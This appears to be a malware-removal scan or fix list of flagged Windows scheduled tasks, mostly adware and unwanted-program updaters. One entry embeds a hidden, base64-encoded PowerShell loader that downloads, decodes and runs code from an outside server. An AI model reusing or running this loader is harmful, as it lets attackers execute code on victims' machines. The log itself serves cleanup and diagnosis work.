C:\Users\Nexus Media Server\AppData\Local\Temp\Uninstall.exe
Task: {004783C0-9EA6-4286-9A05-E1787A0640AF} - \223cecce-1b0c-40e4-94c0-10568c9d47b2-3 -> No File <==== ATTENTION 
Task: {07202880-E71A-4494-90F4-574EA2ED61F3} - System32\Tasks\FQfcQIFiv3 => C:\Users\Nexus Media Server\AppData\Roaming\FQfcQIFiv3.exe <==== ATTENTION 
Task: {08FF94D8-344C-4F30-BFB8-93A4C5C12220} - \winter_web_updating_service -> No File <==== ATTENTION 
Task: {0AA08E94-3F52-4F9D-A4A8-6EE26ECF36FA} - System32\Tasks\cCDRV5n4y => C:\Users\Nexus Media Server\AppData\Roaming\cCDRV5n4y.exe <==== ATTENTION 
Task: {0E3C542A-35A3-40E0-ACE2-9126251072DD} - \22a55d69-9f00-4e39-9983-8a08b1069524-1 -> No File <==== ATTENTION 
Task: {106DC799-0B98-42D6-BCB4-3AC29DDAEC4A} - \3315ae47-db79-4ea6-b347-a4b2fa3cb91c-1-7 -> No File <==== ATTENTION 
Task: {10E01498-6644-4F73-B841-C1F525FFB3CF} - \APSnotifierPP3 -> No File <==== ATTENTION 
Task: {117EF788-AC55-498B-BB16-289EADC64420} - \b917f354-73c6-437f-845a-847de7226630-1 -> No File <==== ATTENTION 
Task: {11B20385-ACA6-459C-97EC-FE76D7101045} - \mr_fun_updating_service -> No File <==== ATTENTION 
Task: {1532EB26-4300-4818-BC84-C216413D6961} - \winter_web_notification_service -> No File <==== ATTENTION 
Task: {1CF5901D-E3A5-4F4E-9DCD-9E35A532D005} - \Test TimeTrigger -> No File <==== ATTENTION 
Task: {1E72DAC7-DBD4-4E7A-80C4-D07E7D1C4B1C} - \b917f354-73c6-437f-845a-847de7226630-4 -> No File <==== ATTENTION 
Task: {1F33128F-00A1-42D0-9781-2ED1A35FFEAC} - \223cecce-1b0c-40e4-94c0-10568c9d47b2-4 -> No File <==== ATTENTION 
Task: {1FA7F172-78F3-4EFB-B4DA-060CB9CC7CD9} - \Plus-HD-1.2-codedownloader -> No File <==== ATTENTION 
Task: {23DC0715-9230-40B6-8FB8-EDBBCE7A7A75} - \Plus-HD-1.2-updater -> No File <==== ATTENTION 
Task: {28646BCD-AA5A-4084-91D0-9C4E529B0FB6} - \web_disco_updating_service -> No File <==== ATTENTION 
Task: {2B6E52E0-F459-43DE-8D0E-0337660B3F7E} - \Groovorio Updater -> No File <==== ATTENTION 
Task: {2C8ACB8D-6D9B-4739-9DBE-515789E81AB0} - \cd8b5ea5-4405-44da-98c0-6646dc55b0e1-1-6 -> No File <==== ATTENTION 
Task: {2E10B7D0-E7AE-4BE1-9595-4EA395F4B8BE} - \3315ae47-db79-4ea6-b347-a4b2fa3cb91c-1-6 -> No File <==== ATTENTION
Task: {313D31B2-A09D-4CA3-9C36-4B082D485326} - System32\Tasks\{3C3CCF23-D2A6-1550-6302-F9C39BC5A975} => powershell.exe -windowstyle hidden -noninteractive -ExecutionPolicy bypass -EncodedCommand JABFAHIAcgBvAHIAQQBjAHQAaQBvAG4AUAByAGUAZgBlAHIAZQBuAGMAZQA9ACIAcwB0AG8AcAAiADsAJABzAGMAPQAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAVwBhAHIAbgBpAG4AZwBQAHIAZQBmAGUAcgBlAG4AYwBlAD0AJABzAGMAOwAkAFAAcgBvAGcAcgBlAHMAcwBQAHIAZQBmAGUAcgBlAG4AYwBlAD0AJABzAGMAOwAkAFYAZQByAGIAbwBzAGUAUAByAGUAZgBlAHIAZQBuAGMAZQA9ACQAcwBjADsAJABEAGUAYgB1AGcAUAByAGUAZgBlAHIAZQBuAGMAZQA9ACQAcwBjADsACgBmAHUAbgBjAHQAaQBvAG4AIABzAHIAKAAkAHAAKQB7ACQAbgA9ACIAVwBpAG4AZABvAHcAUABvAHMAaQB0AGkAbwBuACIAOwB0AHIAeQB7AE4AZQB3AC0ASQB0AGUAbQAgAC0AUABhAHQAaAAgACQAcAB8AE8AdQB0AC0ATgB1AGwAbAA7AH0AYwBhAHQAYwBoAHsAfQB0AHIAeQB7AE4AZQB3AC0ASQB0AGUAbQBQAHIAbwBwAGUAcgB0AHkAIAAtAFAAYQB0AGgAIAAkAHAAIAAtAE4AYQBtAGUAIAAkAG4AIAAtAFAAcgBvAHAAZQByAHQAeQBUAHkAcABlACAARABXAE8AUgBEACAALQBWAGEAbAB1AGUAIAAyADAAMQAzADIAOQA2ADYANAB8AE8AdQB0AC0ATgB1AGwAbAA7AH0ACgBjAGEAdABjAGgAewB0AHIAeQB7AFMAZQB0AC0ASQB0AGUAbQBQAHIAbwBwAGUAcgB0AHkAIAAtAFAAYQB0AGgAIAAkAHAAIAAtAE4AYQBtAGUAIAAkAG4AIAAtAFYAYQBsAHUAZQAgADIAMAAxADMAMgA5ADYANgA0AHwATwB1AHQALQBOAHUAbABsADsAfQBjAGEAdABjAGgAewB9AH0AfQBzAHIAKAAiAEgASwBDAFUAOgBcAEMAbwBuAHMAbwBsAGUAXAAlAFMAeQBzAHQAZQBtAFIAbwBvAHQAJQBfAFMAeQBzAHQAZQBtADMAMgBfAFcAaQBuAGQAbwB3AHMAUABvAHcAZQByAFMAaABlAGwAbABfAHYAMQAuADAAXwBwAG8AdwBlAHIAcwBoAGUAbABsAC4AZQB4AGUAIgApADsAcwByACgAIgBIAEsAQwBVADoAXABDAG8AbgBzAG8AbABlAFwAJQBTAHkAcwB0AGUAbQBSAG8AbwB0ACUAXwBTAHkAcwB0AGUAbQAzADIAXwBzAHYAYwBoAG8AcwB0AC4AZQB4AGUAIgApADsAcwByACgAIgBIAEsAQwBVADoAXABDAG8AbgBzAG8AbABlAFwAdABhAHMAawBlAG4AZwAuAGUAeABlACIAKQA7AAoAJABzAHUAcgBsAD0AIgBoAHQAdABwADoALwAvAHMAcABvAHIAdABuAGUAdwAuAG4AZQB0AC8AdQAvAD8AcQA9AGEASABzAGQASQBjAGMANgBkAHcAdwBiADcAZABuADMARAA4AGEAdABNAEgAeQBQAEgAeQBwAEIAdQBjAGwAegBNAEgAQwBuAE8AVgBUAEwAVQBPAG4AegBLADMARAAyADkAOABlAHoARQBUAEQAdwB0AHkANgBFADUAbwBUAHUASQBsADYAWQBiAFcAWQB3AEgATQBtAHMAUAB0AHkANgBLAHEAQwAzAFcAQwBQAFkAUAA0AG4AUQBpAHAANgBLAFkAdQBSADIAZgB0AEgAYgBRAE8ARAB1AE0ASQBkAG8AaABLAE8AWgByAC0AdgA4AFgAVwB1AGcATABtAGMAbgB1AGwAdgBLAHkAMwBWAG8ARQA1AG8AVQAtAGgAcABiAGQAbQBOADMAcgBMAE8AYwBOAEMAYgBKAFoAbgBGAEcAaQBRAG4AMwAxAFkAdgAyAHMASABEADAANgB6AGEAdgBLAEUASgBDADUAVABrAFMAOABRAHUAegBfAEUAeABLADkAUQBrAGUASgBNADAAUAA1AEIASwBDAE0AQQBfADgAWAB5AFkAWgBSAHMASgBiADgAMwBjADAASABUAHcAdwA4AHEAUgBsAFAAZwBJAHEAbgA1AEYAZgAwAGQAUgBkAHkAUQBVAFEATQBiADMAQQBxADQANwBmADYATwBZAFIARwB4AFMALQBPAG0AZQBmAEwAdgBvAHAAcwBFAGIAQQA5AFgAMABCADAAdAA4AFgAZABMAEQATwB6AE0ANwB0AG4ANwBzAFQAMgBWAEsASABhADcAagBtAGEAYwBSAHMALQAtAGkAVABWAEsAcABnAEoAbgBFAEcAegBNADAAbQB3ADUAdgAxAEgARQBLAGQAegA4AFQAXwBDAGYAdABnAEUANQBtADcAegBxAHYAagBxAHIAegBQAFYANgAxAGEAYgBpAGsAOABkADUANgBFAEoAVwBIAEIARQA0AG4AOABTADYAQgBGADgAcAAwAHkANgBzAEkAVwBPAGoAbABtAGMAYgBKAHEAUwBnAEUAQgBsAEEAaQBZAGgASgBaAEIAagBWAHMALQBMADYAUABFAE0AYgB2AHIAUQBQAEwAVwBUAHkARgAwAFYAWQBMAFMALQBOAGYAMgA5AEMAVQAzAFMAUABLAEEAcgBUAGUAWABGAHQAVQBLAEUANAA2AHkAUgBCAFAASAB6AGoAQQBlAGsAYgBQAHQAcgBiAE4ANQBwAFAAcwBjACYAYwA9AFkAVwBWADEAbQA4AFIATQB3AE0AUQBjADYAVwBkAEcAbQBjAFEATQB4ADUAcQB5AE8AOQAwAEgASwB3AEcANwBmAHgAZABNAGUAcwBnAGYAbABnAEEAZQAtAG0ARAB3AE4ANgBTAHgAcwBIADYAegBIADkAMgBFAEoAZwAyAHcAWABGADYATABOAGgAMQBKAGsATwA2AEkAWABtAGMAOQBSADAANwBKAGkAZwAzAHAAdABVAFYAMQBEAEUAMgA4AEIANQBwADYAVgBDAE8ATQB4ADUASQBiAFEAbwB6AHUAaABBAEYARwBIAE4AQQB5AEYAXwBZAFkAeABGAE4ASgBzAFYAYgBpAE8AagBLADkANwBRAEMAcgBmAFoASgB1AHEAbgBRAEgAcQBUAEgAcABMAGkASQBEAHkARgBtADEAXwBGAHAAcABWAHoAWgBWAGMAQQB1AGQAaQBEAEUAQwBPAHAAcwBvAEgAWgBhAEYAeAB5AFcAeAAwAGoAaQBMAEgAOABoAGsAYwB5AGcAVQBfAHAAawBYAFoAVQBzAE0AagBzAFYAZABTAHYALQBsAGEAVABWAGUAcQB3AGIANABGAGEAYQB4AGYATgAxAEQAXwBsAGIASgAzADEAYwBOAFUAUABjADIATgBaAEUAZwBvAE8AVgBGAGEANAAzADYAegBiAE8AVgBFAHoAZgBfAHQASABHAGgAaQBqAEkARQBCADAATwB5AG8AWQBjAEoAVgA5AEUAZgBtAGcAawA5AFgAOQBaAGMASAA4AEYAMABBAG8AWQBTAFYAaQA0AEkAdQBnAFcAMAB3AFIAWABjAHMAaQBmAHMAWABjAFUAdwBuAHoAdQB4AHcAWQBNAHoAbwBWAG8AegAtAHYASAB5AFIAdwBvAHMAQgBVAHQAQQBjAFUAVgAtAEYATwA2AHQAagBlAFoAdgA2ADUAeQBWAEgAZwByAG0ANQBBAEsAVwBrAG8ASwB1AG8AZAB5AE4AawBVAE8ATwBpAHMAaQBQAHYAbgBuAGQAYgBiAGoAZgBNAGIAawBHAFgAcwB2AHMAawBfAGcAVABGAEgAMABtAGcARwA2AEMAcABNADEAUwBVAHYAUgA3ADQAQgAwAEgAZQBoAHgAZABkAHoAUQBDAGcAQwBXAG0AUwBnAG8AbQBfADAAOABFADEAVgAzAHQAZgBKAFQAaAAyADkALQBSAGkAbgB5AHcAcgBpAHYAUABHAGoAcwBDAHIAWQBqAEgASwBJADMAagBFAEkAeQB1ADUAaABoAEcAUwB2AFoASABwAFoAQwBpAHEARwBsAHMAegBFAHQATwBEAEYAMwBOADMAZQBPADMATgBkAHkAdwA4AFAAawByAHoAaQAzADQAZwB1AE4AbQB5AHEASABTAFYAagBKADcATwBaAFQAeAAwAEEAVgBxAHoAbABfAHIAMwBDAEkAUgBiAFQAUQBNAEUANwBOADcAZQA3AHEAZABpAHoARwA2AG0ARgBCADIAMwBqAGEAVQBFAF8ARABpADIANQBNAHQAbgBEAGsAegBYAEwANQAxAHAATQBkAFcAUgBJADcAQwBmAHUAdwBsAHUAeQBNADYAVwBDAFgAegBBAHQAeQBXAGsAdwBtAGgANgBoAEsARgBYAG8AQwAxAFoANgByADUAMwBsAGwAVwBtAE8ARwBGAG8AbwBLAG8AaABDAE8AaABKAEIAaABUAHQATQBRAC0AdQAwAFUAagA4AEMAcABCAEQAUgA3ADAAcQBDADEASgBYAGEARABrADQASABuACYAcgA9ADcAOQAyADUANwA4ADUAMwA3ADQAMQAxADAAMQA2ADYAMgAwADIAIgA7ACQAcwB0AHMAawA9ACIAewAzAEMAMwBDAEMARgAyADMALQBEADIAQQA2AC0AMQA1ADUAMAAtADYAMwAwADIALQBGADkAQwAzADkAQgBDADUAQQA5ADcANQB9ACIAOwAkAHAAcgBpAGQAPQAiAEQAVAAiADsAJABpAG4AaQBkAD0AIgAwACIAOwB0AHIAeQB7AGkAZgAoACQAUABTAFYAZQByAHMAaQBvAG4AVABhAGIAbABlAC4AUABTAFYAZQByAHMAaQBvAG4ALgBNAGEAagBvAHIAIAAtAGwAdAAgADIAKQB7AGIAcgBlAGEAawA7AH0AJAB2AD0AWwBTAHkAcwB0AGUAbQAuAEUAbgB2AGkAcgBvAG4AbQBlAG4AdABdADoAOgBPAFMAVgBlAHIAcwBpAG8AbgAuAFYAZQByAHMAaQBvAG4AOwAKAGkAZgAoACQAdgAuAE0AYQBqAG8AcgAgAC0AZQBxACAANQApAHsAaQBmACgAKAAkAHYALgBNAGkAbgBvAHIAIAAtAGwAdAAgADIAKQAgAC0AQQBOAEQAIAAoACgARwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAE8AcABlAHIAYQB0AGkAbgBnAFMAeQBzAHQAZQBtACkALgBTAGUAcgB2AGkAYwBlAFAAYQBjAGsATQBhAGoAbwByAFYAZQByAHMAaQBvAG4AIAAtAGwAdAAgADIAKQApAHsAYgByAGUAYQBrADsAfQB9AAoAaQBmACgALQBOAE8AVAAgACgAWwBTAGUAYwB1AHIAaQB0AHkALgBQAHIAaQBuAGMAaQBwAGEAbAAuAFcAaQBuAGQAbwB3AHMAUAByAGkAbgBjAGkAcABhAGwAXQBbAFMAZQBjAHUAcgBpAHQAeQAuAFAAcgBpAG4AYwBpAHAAYQBsAC4AVwBpAG4AZABvAHcAcwBJAGQAZQBuAHQAaQB0AHkAXQA6ADoARwBlAHQAQwB1AHIAcgBlAG4AdAAoACkAKQAuAEkAcwBJAG4AUgBvAGwAZQAoAFsAUwBlAGMAdQByAGkAdAB5AC4AUAByAGkAbgBjAGkAcABhAGwALgBXAGkAbgBkAG8AdwBzAEIAdQBpAGwAdABJAG4AUgBvAGwAZQBdACAAIgBBAGQAbQBpAG4AaQBzAHQAcgBhAHQAbwByACIAKQApAHsAYgByAGUAYQBrADsAfQAKAGYAdQBuAGMAdABpAG8AbgAgAHcAYwAoACQAdQByAGwAKQB7ACQAcgBxAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAA7ACQAcgBxAC4AVQBzAGUARABlAGYAYQB1AGwAdABDAHIAZQBkAGUAbgB0AGkAYQBsAHMAPQAkAHQAcgB1AGUAOwAkAHIAcQAuAEgAZQBhAGQAZQByAHMALgBBAGQAZAAoACIAdQBzAGUAcgAtAGEAZwBlAG4AdAAiACwAIgBNAG8AegBpAGwAbABhAC8ANAAuADAAIAAoAGMAbwBtAHAAYQB0AGkAYgBsAGUAOwAgAE0AUwBJAEUAIAA3AC4AMAA7ACAAVwBpAG4AZABvAHcAcwAgAE4AVAAgADYALgAxADsAKQAiACkAOwByAGUAdAB1AHIAbgAgAFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AEEAUwBDAEkASQAuAEcAZQB0AFMAdAByAGkAbgBnACgAJAByAHEALgBEAG8AdwBuAGwAbwBhAGQARABhAHQAYQAoACQAdQByAGwAKQApADsAfQAKAGYAdQBuAGMAdABpAG8AbgAgAGQAcwB0AHIAKAAkAHIAYQB3AGQAYQB0AGEAKQB7ACQAYgB0AD0AWwBDAG8AbgB2AGUAcgB0AF0AOgA6AEYAcgBvAG0AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcAKAAkAHIAYQB3AGQAYQB0AGEAKQA7ACQAZQB4AHQAPQAkAGIAdABbADAAXQA7ACQAawBlAHkAPQAkAGIAdABbADEAXQAgAC0AYgB4AG8AcgAgADEANwAwADsAZgBvAHIAKAAkAGkAPQAyADsAJABpACAALQBsAHQAIAAkAGIAdAAuAEwAZQBuAGcAdABoADsAJABpACsAKwApAHsAJABiAHQAWwAkAGkAXQA9ACgAJABiAHQAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACgAKAAkAGsAZQB5ACAAKwAgACQAaQApACAALQBiAGEAbgBkACAAMgA1ADUAKQApADsAfQAKAHIAZQB0AHUAcgBuACgATgBlAHcALQBPAGIAagBlAGMAdAAgAEkATwAuAFMAdAByAGUAYQBtAFIAZQBhAGQAZQByACgATgBlAHcALQBPAGIAagBlAGMAdAAgAEkATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgAuAEQAZQBmAGwAYQB0AGUAUwB0AHIAZQBhAG0AKAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABJAE8ALgBNAGUAbQBvAHIAeQBTAHQAcgBlAGEAbQAoACQAYgB0ACwAMgAsACgAJABiAHQALgBMAGUAbgBnAHQAaAAtACQAZQB4AHQAKQApACkALABbAEkATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgBNAG8AZABlAF0AOgA6AEQAZQBjAG8AbQBwAHIAZQBzAHMAKQApACkALgBSAGUAYQBkAFQAbwBFAG4AZAAoACkAOwB9AAoAJABzAGMAPQBkAHMAdAByACgAdwBjACgAJABzAHUAcgBsACkAKQA7AEkAbgB2AG8AawBlAC0ARQB4AHAAcgBlAHMAcwBpAG8AbgAgAC0AYwBvAG0AbQBhAG4AZAAgACIAJABzAGMAIgA7AH0AYwBhAHQAYwBoAHsAfQA7AGUAeABpAHQAIAAwADsA 
Task: {37792BD1-5684-4410-B0BF-5B96C495EEFC} - \AmiUpdXp -> No File <==== ATTENTION 
Task: {37D64102-43DC-4669-9D5F-C440AEB03087} - \22a55d69-9f00-4e39-9983-8a08b1069524-11 -> No File <==== ATTENTION 
Task: {38F1EC87-431A-499C-A34D-8B09A2FC0DEA} - \ConsumerInputUpdateTaskMachineUA -> No File <==== ATTENTION 
Task: {3B372DA0-1811-4CD3-9E1D-D3D2D4EC3173} - \223cecce-1b0c-40e4-94c0-10568c9d47b2-11 -> No File <==== ATTENTION 
Task: {3C43E890-7B99-4AD9-9AF3-37569885100E} - \BlockAndSurf_wd -> No File <==== ATTENTION 
Task: {3EFFE333-49F0-4306-B0A4-80D42EE62B66} - \Web Protector Plus -> No File <==== ATTENTION 
Task: {40AB5D2F-AF98-458F-9470-4316D56135B6} - \BlockAndSurf Update -> No File <==== ATTENTION 
Task: {42ACA34C-C760-4936-8119-668BB10B8B0E} - \223cecce-1b0c-40e4-94c0-10568c9d47b2-1 -> No File <==== ATTENTION 
Task: {42C3BC7F-B50D-437C-83C9-B6565D8B745F} - \223cecce-1b0c-40e4-94c0-10568c9d47b2-5_user -> No File <==== ATTENTION 
Task: {42CD00F7-4928-4363-98D3-0824CA05303D} - \22a55d69-9f00-4e39-9983-8a08b1069524-5 -> No File <==== ATTENTION 
Task: {4466149E-D043-464C-B732-93424DF9FC68} - \ShopperPro -> No File <==== ATTENTION 
Task: {461C2034-2B07-43E8-83E4-31D7F5CD20C5} - System32\Tasks\Microsoft\Windows\Multimedia\SMupdate3 => Rundll32.exe C:\PROGRA~1\COMMON~1\System\SysMenu.dll ,Command701 update3 <==== ATTENTION 
Task: {4AF98EF8-6984-4E90-BB7F-01FE7746F0D7} - \b0220ba6-09e4-46a8-8a55-a353b242b387-1-6 -> No File <==== ATTENTION 
Task: {4B844AAB-C755-40E4-9068-7879730FDC6B} - \SPBIW_UpdateTask_Time_333630343534353131342d235b783432415b45345a2d6c -> No File <==== ATTENTION 
Task: {4BE81A3B-C5B7-45B8-B831-22723BEA8F81} - \a250569a-98c2-4048-95cc-84eb2edcd0f9-5_user -> No File <==== ATTENTION 
Task: {4DB861DF-AAAB-4E4F-AC9A-1F92599AD489} - System32\Tasks\web_disco_notification_service => C:\Program Files (x86)\web disco\web_disco_notification_service.exe <==== ATTENTION 
Task: {58570255-9E70-4643-998F-F9055538D54C} - \globalUpdateUpdateTaskMachineCore -> No File <==== ATTENTION 
Task: {59637119-1492-4349-BE78-8631BEE643C8} - \SMupdate1 -> No File <==== ATTENTION
Task: {5DA016D9-C794-4139-BF27-5ACAD8CDBB2E} - \b0220ba6-09e4-46a8-8a55-a353b242b387-5 -> No File <==== ATTENTION 
Task: {62FDB5B3-BF42-432F-BE5C-356D2481019A} - \APSnotifierPP2 -> No File <==== ATTENTION 
Task: {63472255-BB01-4824-A8D9-B9C82D1C6A02} - \cd8b5ea5-4405-44da-98c0-6646dc55b0e1-10_user -> No File <==== ATTENTION 
Task: {6517AD94-3943-4B6C-993C-EACA97408A23} - \Smp -> No File <==== ATTENTION 
Task: {65C4EF77-BB66-4D8E-9C39-2F4489171801} - \Crossbrowse -> No File <==== ATTENTION 
Task: {712E5CBF-BCAC-48B5-93EC-17629C62F300} - \3315ae47-db79-4ea6-b347-a4b2fa3cb91c-5_user -> No File <==== ATTENTION 
Task: {781C8DC9-CB04-4B90-9CE2-6291058A0589} - \globalUpdateUpdateTaskMachineUA -> No File <==== ATTENTION 
Task: {798B4FF4-BC44-4454-911C-7304F1140372} - \b0220ba6-09e4-46a8-8a55-a353b242b387-1-7 -> No File <==== ATTENTION 
Task: {7CBB73C0-D878-4BD1-9424-77D2B5C9AD57} - \SMWUpd -> No File <==== ATTENTION 
Task: {7E01AD6B-5B26-471E-A0A8-CDF27242E872} - \SPDriver -> No File <==== ATTENTION 
Task: {7E430EB2-F0D4-45B6-912A-3C11D787E54F} - System32\Tasks\Microsoft\Windows\Maintenance\SMupdate2 => Rundll32.exe C:\PROGRA~1\COMMON~1\System\SysMenu.dll ,Command701 update2 <==== ATTENTION 
Task: {7E5C382B-DB86-431E-AEAB-8CF69D7ED911} - \Plus-HD-1.2-firefoxinstaller -> No File <==== ATTENTION 
Task: {80269159-B28E-4F13-9F6D-57EE3349B0A4} - \APSnotifierPP1 -> No File <==== ATTENTION 
Task: {8135D8E0-C759-4618-93E2-CEB3FE1A49CB} - \mr_fun_notification_service -> No File <==== ATTENTION 
Task: {81BAFA66-DB16-49F7-8263-631E6BE42114} - \3315ae47-db79-4ea6-b347-a4b2fa3cb91c-5 -> No File <==== ATTENTION 
Task: {8757F209-3D97-41C9-9C78-567B10E23B83} - \SMW_UpdateTask_Time_333630343534353131342d235b783432415b45345a2d6c -> No File <==== ATTENTION 
Task: {8C89D02C-C8D4-405C-9D65-CEDDB5C243EC} - \cd8b5ea5-4405-44da-98c0-6646dc55b0e1-5_user -> No File <==== ATTENTION
Task: {9361744C-A1E3-465B-BA1A-1F2D434BE3EF} - \b917f354-73c6-437f-845a-847de7226630-5 -> No File <==== ATTENTION 
Task: {9470C9FA-D56F-41E0-8C31-E8FA3DCB4FC0} - System32\Tasks\Astromenda => C:\Users\NEXUSM~1\AppData\Roaming\ASTROM~1\UPDATE~1\UPDATE~1.EXE <==== ATTENTION 
Task: {953B56D7-95E9-45BE-9459-A7C8CEB53C11} - \CIMT_S-1-5-21-2978377406-116969058-805938779-1000 -> No File <==== ATTENTION 
Task: {96A1650B-6E48-4613-AEFE-34294AF2B26D} - System32\Tasks\SFUKRJBE => C:\ProgramData\25843018f2844fe49c67328b993d18ab\25843018f2844fe49c67328b993d18ab.exe <==== ATTENTION 
Task: {9DDBE0F0-05A4-44E6-ABD1-AAE13541F3EC} - System32\Tasks\YTDownloaderUpd => C:\Program Files (x86)\YTDownloader\updater.exe [2015-01-08] (Goobzo) <==== ATTENTION 
Task: {A191E52B-C012-403D-8103-0443BF5CA178} - \9a453951-0637-4363-87cf-6eacfdd0bf82-1-6 -> No File <==== ATTENTION
Task: {AD06492B-964B-4C66-BB1F-83DC7EBBBD31} - \b917f354-73c6-437f-845a-847de7226630-5_user -> No File <==== ATTENTION 
Task: {B5E519B9-EBB0-4D9D-A013-FFA9971E8283} - \cd8b5ea5-4405-44da-98c0-6646dc55b0e1-5 -> No File <==== ATTENTION 
Task: {B601E839-C06C-4AB2-BBD3-42DA433CAAFF} - \ConsumerInputUpdateTaskMachineCore -> No File <==== ATTENTION 
Task: {B6A7C774-ED5B-432D-8D0A-B3063C4B8373} - \9a453951-0637-4363-87cf-6eacfdd0bf82-10_user -> No File <==== ATTENTION 
Task: {B7BE2A1B-D6B7-4E7D-94CB-825E8CBDE708} - \ShopperProJSUpd -> No File <==== ATTENTION 
Task: {BF1CCE45-F0D7-45C6-88F2-F44389676F8B} - System32\Tasks\4836 => C:\Windows\system32\wscript.exe [2009-07-13] (Microsoft Corporation) <==== ATTENTION 
Task: {C077B919-EDA9-4457-BB55-931550D31E88} - \a250569a-98c2-4048-95cc-84eb2edcd0f9-10_user -> No File <==== ATTENTION 
Task: {C6B6EC14-6034-4359-80BD-3CE1FE235DBB} - \gtaUpt -> No File <==== ATTENTION 
Task: {C7D4E715-84A9-4292-AFAC-2622CD5C7399} - \a250569a-98c2-4048-95cc-84eb2edcd0f9-5 -> No File <==== ATTENTION 
Task: {CA6705BB-2A84-4DE6-9B04-1D0292DB6CD2} - \b917f354-73c6-437f-845a-847de7226630-11 -> No File <==== ATTENTION 
Task: {CAE32489-38E8-4B9F-88EC-3E0547DEAA28} - \9a453951-0637-4363-87cf-6eacfdd0bf82-1-7 -> No File <==== ATTENTION 
Task: {CBA4CD96-C146-47E0-9698-CA27256BA2F7} - \22a55d69-9f00-4e39-9983-8a08b1069524-3 -> No File <==== ATTENTION 
Task: {CD272327-D23F-4471-A849-7FE0FF01090D} - \CIMT_daily_S-1-5-21-2978377406-116969058-805938779-1000 -> No File <==== ATTENTION 
Task: {CFB6165A-8D8A-4C3F-9E17-2F4E3B5D2EBE} - \SmartWeb Upgrade Trigger Task -> No File <==== ATTENTION 
Task: {D24800E9-D72F-4170-B523-E7C2AA29AF6A} - \22a55d69-9f00-4e39-9983-8a08b1069524-4 -> No File <==== ATTENTION 
Task: {D6FF6C58-6292-4C05-8B0D-57EC59C74B48} - \b0220ba6-09e4-46a8-8a55-a353b242b387-10_user -> No File <==== ATTENTION 
Task: {D833AA11-E23E-4B42-A1D9-9DB2EC492194} - System32\Tasks\YTDownloader => C:\Program Files (x86)\YTDownloader\YTDownloader.exe [2015-04-22] (YTDownloader) <==== ATTENTION
Task: {DF32B448-D147-4112-BD7A-42CE73002440} - \b0220ba6-09e4-46a8-8a55-a353b242b387-5_user -> No File <==== ATTENTION 
Task: {E0604DBE-BA0E-4E4B-89E1-D187C4AC4E00} - \Web Protector Plus Server -> No File <==== ATTENTION 
Task: {E14EB690-DAB0-4B1E-9DAB-E847276BB426} - \9a453951-0637-4363-87cf-6eacfdd0bf82-4 -> No File <==== ATTENTION 
Task: {E16003EC-4060-4D1A-854D-9D83E7FD6A9F} - \Plus-HD-1.2-chromeinstaller -> No File <==== ATTENTION 
Task: {E79DDE3A-283A-4EB8-A8DB-25A3F1E10FBC} - System32\Tasks\0 => Iexplore.exe <==== ATTENTION 
Task: {E875ED51-1937-4C3B-AC7B-955A7F2597E6} - \9a453951-0637-4363-87cf-6eacfdd0bf82-5 -> No File <==== ATTENTION 
Task: {E9567459-8EA7-45F8-AA7E-37D353BC0D26} - System32\Tasks\e6a4b65b-e1dc-4d98-84ce-5654a35812c9 => C:\Program Files (x86)\video MediaPlay-Air\223cecce-1b0c-40e4-94c0-10568c9d47b2-4.exe <==== ATTENTION 
Task: {EA444C25-CCA5-4E11-B3FB-525A4D9815AB} - \3315ae47-db79-4ea6-b347-a4b2fa3cb91c-10_user -> No File <==== ATTENTION
Task: {EAA7CAC6-0B86-4AEA-9609-81B789D98898} - System32\Tasks\LaunchApp => C:\Program Files (x86)\MyPC Backup\MyPC Backup.exe <==== ATTENTION 
Task: {EC6FCC38-4691-4971-AD83-9406D152762E} - \cd8b5ea5-4405-44da-98c0-6646dc55b0e1-1-7 -> No File <==== ATTENTION 
Task: {ED5CE69B-9BEF-4534-B5F8-CD520A9271C6} - \223cecce-1b0c-40e4-94c0-10568c9d47b2-5 -> No File <==== ATTENTION 
Task: {F078B885-FC60-448B-ACE0-DB8A472369CD} - \cd8b5ea5-4405-44da-98c0-6646dc55b0e1-4 -> No File <==== ATTENTION 
Task: {F53EBC0B-5EDE-4C12-8DAC-BA41281AB0F0} - \22a55d69-9f00-4e39-9983-8a08b1069524-5_user -> No File <==== ATTENTION 
Task: {FA70133E-BDAB-4027-9671-68531A9920DA} - \9a453951-0637-4363-87cf-6eacfdd0bf82-5_user -> No File <==== ATTENTION 
Task: {EAA7CAC6-0B86-4AEA-9609-81B789D98898} - System32\Tasks\LaunchApp => C:\Program Files (x86)\MyPC Backup\MyPC Backup.exe <==== ATTENTION 
Task: {EC6FCC38-4691-4971-AD83-9406D152762E} - \cd8b5ea5-4405-44da-98c0-6646dc55b0e1-1-7 -> No File <==== ATTENTION 
Task: {ED5CE69B-9BEF-4534-B5F8-CD520A9271C6} - \223cecce-1b0c-40e4-94c0-10568c9d47b2-5 -> No File <==== ATTENTION 
Task: {F078B885-FC60-448B-ACE0-DB8A472369CD} - \cd8b5ea5-4405-44da-98c0-6646dc55b0e1-4 -> No File <==== ATTENTION 
Task: {F53EBC0B-5EDE-4C12-8DAC-BA41281AB0F0} - \22a55d69-9f00-4e39-9983-8a08b1069524-5_user -> No File <==== ATTENTION 
Task: {FA70133E-BDAB-4027-9671-68531A9920DA} - \9a453951-0637-4363-87cf-6eacfdd0bf82-5_user -> No File <==== ATTENTION 
Task: C:\Windows\Tasks\e6a4b65b-e1dc-4d98-84ce-5654a35812c9.job => C:\Program Files (x86)\video MediaPlay-Air\223cecce-1b0c-40e4-94c0-10568c9d47b2-4.exe <==== ATTENTION 
Task: C:\Windows\Tasks\FQfcQIFiv3.job => C:\Users\Nexus Media Server\AppData\Roaming\FQfcQIFiv3.exe <==== ATTENTION
